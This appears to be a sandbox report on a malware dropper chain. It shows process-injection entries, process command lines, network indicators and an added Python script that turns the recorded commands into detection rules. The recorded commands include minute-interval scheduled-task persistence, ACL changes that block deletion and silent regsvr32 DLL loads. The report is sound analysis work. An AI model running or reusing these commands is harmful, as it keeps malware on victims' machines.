PID 3344 wrote to memory of 1336 N/A N/A C:\Users\Admin\AppData\Local\Temp\1461.exe
PID 3344 wrote to memory of 2596 N/A N/A C:\Users\Admin\AppData\Local\Temp\1C32.exe
PID 3344 wrote to memory of 2596 N/A N/A C:\Users\Admin\AppData\Local\Temp\1C32.exe
PID 3344 wrote to memory of 2596 N/A N/A C:\Users\Admin\AppData\Local\Temp\1C32.exe
PID 3344 wrote to memory of 3836 N/A N/A C:\Users\Admin\AppData\Local\Temp\2318.exe
PID 3344 wrote to memory of 3836 N/A N/A C:\Users\Admin\AppData\Local\Temp\2318.exe
PID 3344 wrote to memory of 3836 N/A N/A C:\Users\Admin\AppData\Local\Temp\2318.exe
PID 3500 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\56A.exe C:\Users\Admin\AppData\Local\Temp\56A.exe
PID 3500 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\56A.exe C:\Users\Admin\AppData\Local\Temp\56A.exe
PID 3500 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\56A.exe C:\Users\Admin\AppData\Local\Temp\56A.exe
PID 3500 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\56A.exe C:\Users\Admin\AppData\Local\Temp\56A.exe
PID 3500 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\56A.exe C:\Users\Admin\AppData\Local\Temp\56A.exe
PID 3500 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\56A.exe C:\Users\Admin\AppData\Local\Temp\56A.exe
PID 3500 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\56A.exe C:\Users\Admin\AppData\Local\Temp\56A.exe
PID 3500 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\56A.exe C:\Users\Admin\AppData\Local\Temp\56A.exe
PID 3500 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\56A.exe C:\Users\Admin\AppData\Local\Temp\56A.exe
PID 3500 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\56A.exe C:\Users\Admin\AppData\Local\Temp\56A.exe
PID 3344 wrote to memory of 1872 N/A N/A C:\Users\Admin\AppData\Local\Temp\5351.exe
PID 3344 wrote to memory of 1872 N/A N/A C:\Users\Admin\AppData\Local\Temp\5351.exe
PID 3344 wrote to memory of 1872 N/A N/A C:\Users\Admin\AppData\Local\Temp\5351.exe
PID 3344 wrote to memory of 1876 N/A N/A C:\Users\Admin\AppData\Local\Temp\5D07.exe
PID 3344 wrote to memory of 1876 N/A N/A C:\Users\Admin\AppData\Local\Temp\5D07.exe
PID 3344 wrote to memory of 1876 N/A N/A C:\Users\Admin\AppData\Local\Temp\5D07.exe
PID 3344 wrote to memory of 2624 N/A N/A C:\Users\Admin\AppData\Local\Temp\6053.exe
PID 3344 wrote to memory of 2624 N/A N/A C:\Users\Admin\AppData\Local\Temp\6053.exe
PID 3344 wrote to memory of 2624 N/A N/A C:\Users\Admin\AppData\Local\Temp\6053.exe
PID 1876 wrote to memory of 4068 N/A C:\Users\Admin\AppData\Local\Temp\5D07.exe C:\Users\Admin\AppData\Local\Temp\aafg31.exe
PID 1876 wrote to memory of 4068 N/A C:\Users\Admin\AppData\Local\Temp\5D07.exe C:\Users\Admin\AppData\Local\Temp\aafg31.exe
PID 1876 wrote to memory of 3212 N/A C:\Users\Admin\AppData\Local\Temp\5D07.exe C:\Users\Admin\AppData\Local\Temp\latestplayer.exe
PID 1876 wrote to memory of 3212 N/A C:\Users\Admin\AppData\Local\Temp\5D07.exe C:\Users\Admin\AppData\Local\Temp\latestplayer.exe
PID 1876 wrote to memory of 3212 N/A C:\Users\Admin\AppData\Local\Temp\5D07.exe C:\Users\Admin\AppData\Local\Temp\latestplayer.exe
PID 3344 wrote to memory of 1216 N/A N/A C:\Users\Admin\AppData\Local\b9864b40-7bb6-493d-bfb1-d5fd4429087e\build2.exe
PID 3344 wrote to memory of 1216 N/A N/A C:\Users\Admin\AppData\Local\b9864b40-7bb6-493d-bfb1-d5fd4429087e\build2.exe
PID 3344 wrote to memory of 1216 N/A N/A C:\Users\Admin\AppData\Local\b9864b40-7bb6-493d-bfb1-d5fd4429087e\build2.exe
PID 3212 wrote to memory of 832 N/A C:\Users\Admin\AppData\Local\Temp\latestplayer.exe C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe
PID 3212 wrote to memory of 832 N/A C:\Users\Admin\AppData\Local\Temp\latestplayer.exe C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe
PID 3212 wrote to memory of 832 N/A C:\Users\Admin\AppData\Local\Temp\latestplayer.exe C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe
PID 832 wrote to memory of 4520 N/A C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe C:\Users\Admin\AppData\Local\b9864b40-7bb6-493d-bfb1-d5fd4429087e\build2.exe
PID 832 wrote to memory of 4520 N/A C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe C:\Users\Admin\AppData\Local\b9864b40-7bb6-493d-bfb1-d5fd4429087e\build2.exe
PID 832 wrote to memory of 4520 N/A C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe C:\Users\Admin\AppData\Local\b9864b40-7bb6-493d-bfb1-d5fd4429087e\build2.exe
PID 832 wrote to memory of 3952 N/A C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe C:\Windows\SysWOW64\cmd.exe
PID 832 wrote to memory of 3952 N/A C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe C:\Windows\SysWOW64\cmd.exe
PID 832 wrote to memory of 3952 N/A C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe C:\Windows\SysWOW64\cmd.exe
PID 2532 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\56A.exe C:\Windows\SysWOW64\icacls.exe
PID 2532 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\56A.exe C:\Windows\SysWOW64\icacls.exe
PID 2532 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\56A.exe C:\Windows\SysWOW64\icacls.exe
PID 3344 wrote to memory of 528 N/A N/A C:\Users\Admin\AppData\Local\Temp\741C.exe
PID 3344 wrote to memory of 528 N/A N/A C:\Users\Admin\AppData\Local\Temp\741C.exe
PID 3344 wrote to memory of 528 N/A N/A C:\Users\Admin\AppData\Local\Temp\741C.exe
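Added example, not from the report or the sandbox vendor: detection rules for the persistence and self-protection command lines this detonation records in the Processes list below (schtasks tasks that fire every minute, CACLS/icacls changes that stop the dropped files from being deleted, silent regsvr32 of a DLL in Temp, the --AutoStart and --Admin IsNotAutoStart IsNotTask relaunch arguments used by the Djvu-tagged processes) and for the SysHelper Run value from "Adds Run key to start application". The sample inputs are copied from those lines; the category names and the rules themselves are this example's own assumptions.

```python
import re
from collections import Counter
from pathlib import PureWindowsPath

# (image, command line) pairs copied from the Processes list of this detonation,
# plus one row copied from the "Adds Run key to start application" table.
SAMPLE_PROCESSES = [
    (r"C:\Windows\system32\regsvr32.exe",
     r"regsvr32 /s C:\Users\Admin\AppData\Local\Temp\849.dll"),
    (r"C:\Windows\SysWOW64\schtasks.exe",
     r'"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN yiueea.exe /TR "C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe" /F'),
    (r"C:\Windows\SysWOW64\cmd.exe",
     r'"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "yiueea.exe" /P "Admin:N"&&CACLS "yiueea.exe" /P "Admin:R" /E&&echo Y|CACLS "..\577f58beff" /P "Admin:N"&&CACLS "..\577f58beff" /P "Admin:R" /E&&Exit'),
    (r"C:\Windows\SysWOW64\icacls.exe",
     r'icacls "C:\Users\Admin\AppData\Local\70d15f63-82c7-494f-84ba-94633b2cacef" /deny *S-1-1-0:(OI)(CI)(DE,DC)'),
    (r"C:\Users\Admin\AppData\Local\Temp\56A.exe",
     r'"C:\Users\Admin\AppData\Local\Temp\56A.exe" --Admin IsNotAutoStart IsNotTask'),
    (r"C:\Windows\SysWOW64\schtasks.exe",
     r'/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"'),
    (r"C:\Users\Admin\AppData\Local\Temp\1461.exe",
     r"C:\Users\Admin\AppData\Local\Temp\1461.exe"),   # plain launch, no rule should fire
]
SAMPLE_RUN_KEY_ROW = (r'Set value (str) \REGISTRY\USER\S-1-5-21-2767205360-3565838719-3800013281-1000'
                      r'\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = '
                      r'"\"C:\\Users\\Admin\\AppData\\Local\\70d15f63-82c7-494f-84ba-94633b2cacef\\56A.exe\" --AutoStart" '
                      r'C:\Users\Admin\AppData\Local\Temp\56A.exe N/A')

SCHTASKS_INTERVAL = re.compile(r"/sc\s+minute\s+/mo\s+(\d+)", re.I)
SCHTASKS_TN = re.compile(r'/tn\s+"?([^"\s]+)"?', re.I)
SCHTASKS_TR = re.compile(r'/tr\s+"([^"]+)"', re.I)
# cacls /P user:N replaces the ACL with "no access"; the chains in this report re-add
# read with /E afterwards, leaving the user unable to modify or delete the dropped file.
CACLS_NONE = re.compile(r'cacls\s+"([^"]+)"\s+/P\s+"([^":]+):N"', re.I)
# icacls /deny Everyone (S-1-1-0) with inheritance on the folder; DE/DC = delete, delete child.
ICACLS_DENY = re.compile(r'icacls\s+"([^"]+)"\s+/deny\s+(?:\*S-1-1-0|everyone):\(OI\)\(CI\)\(([^)]*)\)', re.I)
REGSVR_TEMP_DLL = re.compile(r"/s\s+(\S+\\temp\\\S+\.dll)", re.I)
DJVU_ARGS = re.compile(r"--(AutoStart|Admin IsNotAutoStart IsNotTask)\b", re.I)
RUN_KEY_ROW = re.compile(r'\\Run\\(\w+) = "(.*)" (\S+) N/A$')


def classify(image: str, cmdline: str):
    """Return a list of (category, detail) findings for one (image, command line) record."""
    findings = []
    exe = PureWindowsPath(image).name.lower()
    if exe == "schtasks.exe" and re.search(r"/create", cmdline, re.I):
        interval = SCHTASKS_INTERVAL.search(cmdline)
        if interval:
            tn, tr = SCHTASKS_TN.search(cmdline), SCHTASKS_TR.search(cmdline)
            findings.append(("persistence",
                             f"task {tn.group(1) if tn else '?'} every {interval.group(1)} min -> "
                             f"{tr.group(1) if tr else '?'}"))
    for m in CACLS_NONE.finditer(cmdline):
        findings.append(("defense-evasion", f"cacls /P {m.group(2)}:N on {m.group(1)}"))
    m = ICACLS_DENY.search(cmdline)
    if m and "DE" in m.group(2).upper().split(","):
        findings.append(("defense-evasion", f"icacls denies Everyone delete on {m.group(1)}"))
    if exe == "regsvr32.exe":
        m = REGSVR_TEMP_DLL.search(cmdline)
        if m:
            findings.append(("execution", f"silent regsvr32 of Temp DLL {m.group(1)}"))
    m = DJVU_ARGS.search(cmdline)
    if m:
        findings.append(("djvu-relaunch", "--" + m.group(1)))
    return findings


def parse_run_key(row: str):
    """Parse a 'Set value (str) ...\\Run\\<name> = "<data>" <process> N/A' row.
    The report escapes backslashes and quotes inside <data>; undo that to get the real command."""
    m = RUN_KEY_ROW.search(row)
    if not m:
        return None
    command = m.group(2).replace("\\\\", "\\").replace('\\"', '"')
    return {"value_name": m.group(1), "command": command, "process": m.group(3)}


def triage(processes, run_key_rows=()):
    """Aggregate findings over the process list and Run-key rows; returns counts per category."""
    counts = Counter()
    for image, cmdline in processes:
        counts.update(cat for cat, _ in classify(image, cmdline))
    for row in run_key_rows:
        parsed = parse_run_key(row)
        if parsed:
            counts["persistence"] += 1          # the Run value itself
            counts.update(cat for cat, _ in classify(parsed["process"], parsed["command"]))
    return dict(counts)


if __name__ == "__main__":
    for image, cmdline in SAMPLE_PROCESSES:
        for cat, detail in classify(image, cmdline):
            print(f"{cat:16} {detail}")
    print(triage(SAMPLE_PROCESSES, [SAMPLE_RUN_KEY_ROW]))
```

The rules key on the shape of the command rather than on the dropped file names, so they still fire when the loader picks new random names; the one-minute schtasks interval and the deny-delete ACL on the dropper's own folder are the parts worth alerting on, since neither has a normal reason to appear under a user's AppData.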

Processes

C:\Users\Admin\AppData\Local\Temp\76aa2d02f34135fd7cb03ad8426fc44cbfbe3ab94493a984df702fbf4975fccc.exe

"C:\Users\Admin\AppData\Local\Temp\76aa2d02f34135fd7cb03ad8426fc44cbfbe3ab94493a984df702fbf4975fccc.exe"

C:\Users\Admin\AppData\Local\Temp\56A.exe

C:\Users\Admin\AppData\Local\Temp\56A.exe

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\849.dll

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\849.dll

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\A6D.dll

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\A6D.dll

C:\Users\Admin\AppData\Local\Temp\1461.exe

C:\Users\Admin\AppData\Local\Temp\1461.exe

C:\Users\Admin\AppData\Local\Temp\1C32.exe

C:\Users\Admin\AppData\Local\Temp\1C32.exe

C:\Users\Admin\AppData\Local\Temp\2318.exe

C:\Users\Admin\AppData\Local\Temp\2318.exe

C:\Users\Admin\AppData\Local\Temp\56A.exe

C:\Users\Admin\AppData\Local\Temp\56A.exe

C:\Users\Admin\AppData\Local\Temp\5351.exe

C:\Users\Admin\AppData\Local\Temp\5351.exe

C:\Users\Admin\AppData\Local\Temp\5D07.exe

C:\Users\Admin\AppData\Local\Temp\5D07.exe

C:\Users\Admin\AppData\Local\Temp\6053.exe

C:\Users\Admin\AppData\Local\Temp\6053.exe

C:\Users\Admin\AppData\Local\Temp\aafg31.exe

"C:\Users\Admin\AppData\Local\Temp\aafg31.exe"

C:\Users\Admin\AppData\Local\Temp\latestplayer.exe

"C:\Users\Admin\AppData\Local\Temp\latestplayer.exe"

C:\Users\Admin\AppData\Local\Temp\66BD.exe

C:\Users\Admin\AppData\Local\Temp\66BD.exe

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

"C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN yiueea.exe /TR "C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "yiueea.exe" /P "Admin:N"&&CACLS "yiueea.exe" /P "Admin:R" /E&&echo Y|CACLS "..\577f58beff" /P "Admin:N"&&CACLS "..\577f58beff" /P "Admin:R" /E&&Exit

C:\Users\Admin\AppData\Local\Temp\741C.exe

C:\Users\Admin\AppData\Local\Temp\741C.exe

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Users\Admin\AppData\Local\70d15f63-82c7-494f-84ba-94633b2cacef" /deny *S-1-1-0:(OI)(CI)(DE,DC)

C:\Users\Admin\AppData\Local\Temp\7BED.exe

C:\Users\Admin\AppData\Local\Temp\7BED.exe

C:\Users\Admin\AppData\Roaming\fjuisiv

C:\Users\Admin\AppData\Roaming\fjuisiv

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "yiueea.exe" /P "Admin:N"

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\9A34.dll

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\9A34.dll

C:\Users\Admin\AppData\Local\Temp\A6B8.exe

C:\Users\Admin\AppData\Local\Temp\A6B8.exe

C:\Users\Admin\AppData\Local\Temp\B30D.exe

C:\Users\Admin\AppData\Local\Temp\B30D.exe

C:\Users\Admin\AppData\Local\Temp\B8EA.exe

C:\Users\Admin\AppData\Local\Temp\B8EA.exe

C:\Windows\SysWOW64\cacls.exe

CACLS "yiueea.exe" /P "Admin:R" /E

C:\Users\Admin\AppData\Local\Temp\56A.exe

"C:\Users\Admin\AppData\Local\Temp\56A.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\DD5B.exe

C:\Users\Admin\AppData\Local\Temp\DD5B.exe

C:\Users\Admin\AppData\Local\Temp\F2A.exe

C:\Users\Admin\AppData\Local\Temp\F2A.exe

C:\Users\Admin\AppData\Local\Temp\5351.exe

C:\Users\Admin\AppData\Local\Temp\5351.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\577f58beff" /P "Admin:N"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2804 -s 788

C:\Windows\SysWOW64\cacls.exe

CACLS "..\577f58beff" /P "Admin:R" /E

C:\Users\Admin\AppData\Local\Temp\66BD.exe

C:\Users\Admin\AppData\Local\Temp\66BD.exe

C:\Users\Admin\AppData\Local\Temp\5351.exe

"C:\Users\Admin\AppData\Local\Temp\5351.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\66BD.exe

"C:\Users\Admin\AppData\Local\Temp\66BD.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\741C.exe

C:\Users\Admin\AppData\Local\Temp\741C.exe

C:\Users\Admin\AppData\Local\Temp\7BED.exe

C:\Users\Admin\AppData\Local\Temp\7BED.exe

C:\Users\Admin\AppData\Local\Temp\7BED.exe

"C:\Users\Admin\AppData\Local\Temp\7BED.exe" --Admin IsNotAutoStart IsNotTask

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3868 -s 336

C:\Users\Admin\AppData\Local\Temp\A6B8.exe

C:\Users\Admin\AppData\Local\Temp\A6B8.exe

C:\Users\Admin\AppData\Local\Temp\741C.exe

"C:\Users\Admin\AppData\Local\Temp\741C.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\56A.exe

"C:\Users\Admin\AppData\Local\Temp\56A.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\A6B8.exe

"C:\Users\Admin\AppData\Local\Temp\A6B8.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\DD5B.exe

C:\Users\Admin\AppData\Local\Temp\DD5B.exe

C:\Users\Admin\AppData\Local\Temp\DD5B.exe

"C:\Users\Admin\AppData\Local\Temp\DD5B.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\5351.exe

"C:\Users\Admin\AppData\Local\Temp\5351.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\c8f4e7d7-89d1-406a-b5a1-5a30aec14f24\build2.exe

"C:\Users\Admin\AppData\Local\c8f4e7d7-89d1-406a-b5a1-5a30aec14f24\build2.exe"

C:\Users\Admin\AppData\Local\c8f4e7d7-89d1-406a-b5a1-5a30aec14f24\build3.exe

"C:\Users\Admin\AppData\Local\c8f4e7d7-89d1-406a-b5a1-5a30aec14f24\build3.exe"

C:\Windows\SysWOW64\schtasks.exe

/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"

C:\Users\Admin\AppData\Local\c8f4e7d7-89d1-406a-b5a1-5a30aec14f24\build2.exe

"C:\Users\Admin\AppData\Local\c8f4e7d7-89d1-406a-b5a1-5a30aec14f24\build2.exe"

C:\Users\Admin\AppData\Local\Temp\66BD.exe

"C:\Users\Admin\AppData\Local\Temp\66BD.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\7BED.exe

"C:\Users\Admin\AppData\Local\Temp\7BED.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\741C.exe

"C:\Users\Admin\AppData\Local\Temp\741C.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\A6B8.exe

"C:\Users\Admin\AppData\Local\Temp\A6B8.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\b0336122-c029-4316-b2ae-4e0ff6ceea31\build2.exe

"C:\Users\Admin\AppData\Local\b0336122-c029-4316-b2ae-4e0ff6ceea31\build2.exe"

C:\Users\Admin\AppData\Local\Temp\DD5B.exe

"C:\Users\Admin\AppData\Local\Temp\DD5B.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\e0d112a2-612a-4039-886c-286ed420b233\build2.exe

"C:\Users\Admin\AppData\Local\e0d112a2-612a-4039-886c-286ed420b233\build2.exe"

C:\Users\Admin\AppData\Local\b0336122-c029-4316-b2ae-4e0ff6ceea31\build2.exe

"C:\Users\Admin\AppData\Local\b0336122-c029-4316-b2ae-4e0ff6ceea31\build2.exe"

C:\Users\Admin\AppData\Local\e0d112a2-612a-4039-886c-286ed420b233\build2.exe

"C:\Users\Admin\AppData\Local\e0d112a2-612a-4039-886c-286ed420b233\build2.exe"

C:\Users\Admin\AppData\Local\b9864b40-7bb6-493d-bfb1-d5fd4429087e\build2.exe

"C:\Users\Admin\AppData\Local\b9864b40-7bb6-493d-bfb1-d5fd4429087e\build2.exe"

C:\Users\Admin\AppData\Local\f3aadb1a-c003-4341-8a50-f0cadcf9adae\build2.exe

"C:\Users\Admin\AppData\Local\f3aadb1a-c003-4341-8a50-f0cadcf9adae\build2.exe"

C:\Users\Admin\AppData\Local\b0336122-c029-4316-b2ae-4e0ff6ceea31\build3.exe

"C:\Users\Admin\AppData\Local\b0336122-c029-4316-b2ae-4e0ff6ceea31\build3.exe"

C:\Windows\SysWOW64\schtasks.exe

/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4196 -s 1744

C:\Users\Admin\AppData\Local\b9864b40-7bb6-493d-bfb1-d5fd4429087e\build2.exe

"C:\Users\Admin\AppData\Local\b9864b40-7bb6-493d-bfb1-d5fd4429087e\build2.exe"

C:\Users\Admin\AppData\Local\f3aadb1a-c003-4341-8a50-f0cadcf9adae\build2.exe

"C:\Users\Admin\AppData\Local\f3aadb1a-c003-4341-8a50-f0cadcf9adae\build2.exe"

C:\Users\Admin\AppData\Local\e0d112a2-612a-4039-886c-286ed420b233\build3.exe

"C:\Users\Admin\AppData\Local\e0d112a2-612a-4039-886c-286ed420b233\build3.exe"

C:\Users\Admin\AppData\Local\b9864b40-7bb6-493d-bfb1-d5fd4429087e\build3.exe

"C:\Users\Admin\AppData\Local\b9864b40-7bb6-493d-bfb1-d5fd4429087e\build3.exe"

C:\Windows\SysWOW64\schtasks.exe

/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"

C:\Users\Admin\AppData\Local\f3aadb1a-c003-4341-8a50-f0cadcf9adae\build3.exe

"C:\Users\Admin\AppData\Local\f3aadb1a-c003-4341-8a50-f0cadcf9adae\build3.exe"

C:\Users\Admin\AppData\Local\b18c185d-55c5-4d93-a92b-45e80665de79\build2.exe

"C:\Users\Admin\AppData\Local\b18c185d-55c5-4d93-a92b-45e80665de79\build2.exe"

C:\Users\Admin\AppData\Local\8f38a24d-0f8f-45db-a3f6-225118bfeef1\build2.exe

"C:\Users\Admin\AppData\Local\8f38a24d-0f8f-45db-a3f6-225118bfeef1\build2.exe"

C:\Users\Admin\AppData\Local\b18c185d-55c5-4d93-a92b-45e80665de79\build2.exe

"C:\Users\Admin\AppData\Local\b18c185d-55c5-4d93-a92b-45e80665de79\build2.exe"

C:\Users\Admin\AppData\Local\8f38a24d-0f8f-45db-a3f6-225118bfeef1\build2.exe

"C:\Users\Admin\AppData\Local\8f38a24d-0f8f-45db-a3f6-225118bfeef1\build2.exe"

C:\Users\Admin\AppData\Local\b18c185d-55c5-4d93-a92b-45e80665de79\build3.exe

"C:\Users\Admin\AppData\Local\b18c185d-55c5-4d93-a92b-45e80665de79\build3.exe"

C:\Windows\SysWOW64\schtasks.exe

/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"

C:\Users\Admin\AppData\Local\8f38a24d-0f8f-45db-a3f6-225118bfeef1\build3.exe

"C:\Users\Admin\AppData\Local\8f38a24d-0f8f-45db-a3f6-225118bfeef1\build3.exe"

C:\Windows\SysWOW64\schtasks.exe

/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Windows\SysWOW64\schtasks.exe

/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 potunulit.org udp
US 188.114.96.0:80 potunulit.org tcp
US 8.8.8.8:53 colisumy.com udp
PE 190.187.52.42:80 colisumy.com tcp
US 8.8.8.8:53 0.96.114.188.in-addr.arpa udp
US 8.8.8.8:53 42.52.187.190.in-addr.arpa udp
US 8.8.8.8:53 carrieremaken.com udp
US 181.214.31.34:443 carrieremaken.com tcp
US 8.8.8.8:53 34.31.214.181.in-addr.arpa udp
US 95.214.25.207:3003 95.214.25.207 tcp
US 8.8.8.8:53 207.25.214.95.in-addr.arpa udp
PE 190.187.52.42:80 colisumy.com tcp
US 8.8.8.8:53 api.2ip.ua udp
NL 162.0.217.254:443 api.2ip.ua tcp
RU 79.137.192.18:80 79.137.192.18 tcp
US 8.8.8.8:53 254.217.0.162.in-addr.arpa udp
US 8.8.8.8:53 18.192.137.79.in-addr.arpa udp
US 8.8.8.8:53 1.202.248.87.in-addr.arpa udp
US 8.8.8.8:53 101.15.18.104.in-addr.arpa udp
US 8.8.8.8:53 us.imgjeoigaa.com udp
HK 103.100.211.218:80 us.imgjeoigaa.com tcp
US 8.8.8.8:53 218.211.100.103.in-addr.arpa udp
RU 79.137.192.18:80 79.137.192.18 tcp
MD 176.123.9.142:14845 tcp
US 8.8.8.8:53 142.9.123.176.in-addr.arpa udp
US 8.8.8.8:53 aa.imgjeoogbb.com udp
HK 154.221.26.108:80 aa.imgjeoogbb.com tcp
US 8.8.8.8:53 108.26.221.154.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 95.214.25.207:3003 95.214.25.207 tcp
PE 190.187.52.42:80 colisumy.com tcp
US 8.8.8.8:53 greenbi.net udp
MK 95.86.21.52:80 greenbi.net tcp
MK 95.86.21.52:80 greenbi.net tcp
US 8.8.8.8:53 9.57.101.20.in-addr.arpa udp
US 8.8.8.8:53 52.21.86.95.in-addr.arpa udp
NL 162.0.217.254:443 api.2ip.ua tcp
MK 95.86.21.52:80 greenbi.net tcp
MK 95.86.21.52:80 greenbi.net tcp
MK 95.86.21.52:80 greenbi.net tcp
US 8.8.8.8:53 126.23.238.8.in-addr.arpa udp
MK 95.86.21.52:80 greenbi.net tcp
MK 95.86.21.52:80 greenbi.net tcp
MK 95.86.21.52:80 greenbi.net tcp
MK 95.86.21.52:80 greenbi.net tcp
US 8.8.8.8:53 177.25.221.88.in-addr.arpa udp
MK 95.86.21.52:80 greenbi.net tcp
NL 162.0.217.254:443 api.2ip.ua tcp
MK 95.86.21.52:80 greenbi.net tcp
MK 95.86.21.52:80 greenbi.net tcp
MK 95.86.21.52:80 greenbi.net tcp
MK 95.86.21.52:80 greenbi.net tcp
MK 95.86.21.52:80 greenbi.net tcp
MK 95.86.21.52:80 greenbi.net tcp
NL 162.0.217.254:443 api.2ip.ua tcp
NL 162.0.217.254:443 api.2ip.ua tcp
US 8.8.8.8:53 123.10.44.20.in-addr.arpa udp
NL 162.0.217.254:443 api.2ip.ua tcp
NL 162.0.217.254:443 api.2ip.ua tcp
NL 162.0.217.254:443 api.2ip.ua tcp
PE 190.187.52.42:80 colisumy.com tcp
US 8.8.8.8:53 zexeq.com udp
KR 222.236.49.124:80 zexeq.com tcp
US 8.8.8.8:53 124.49.236.222.in-addr.arpa udp
KR 222.236.49.124:80 zexeq.com tcp
NL 162.0.217.254:443 api.2ip.ua tcp
PE 190.187.52.42:80 colisumy.com tcp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
NL 162.0.217.254:443 api.2ip.ua tcp
US 8.8.8.8:53 99.167.154.149.in-addr.arpa udp
PE 190.187.52.42:80 colisumy.com tcp
NL 162.0.217.254:443 api.2ip.ua tcp
US 8.8.8.8:53 41.249.124.192.in-addr.arpa udp
PE 190.187.52.42:80 colisumy.com tcp
DE 5.75.171.168:27002 5.75.171.168 tcp
US 8.8.8.8:53 168.171.75.5.in-addr.arpa udp
NL 162.0.217.254:443 api.2ip.ua tcp
US 8.8.8.8:53 colisumy.com udp
RO 62.217.232.10:80 colisumy.com tcp
NL 162.0.217.254:443 api.2ip.ua tcp
KR 222.236.49.124:80 zexeq.com tcp
US 8.8.8.8:53 10.232.217.62.in-addr.arpa udp
RO 62.217.232.10:80 colisumy.com tcp
